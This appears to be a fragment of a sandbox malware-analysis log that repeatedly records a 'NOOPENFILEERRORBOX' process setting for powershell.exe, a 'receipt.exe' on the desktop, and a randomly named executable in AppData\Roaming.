            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
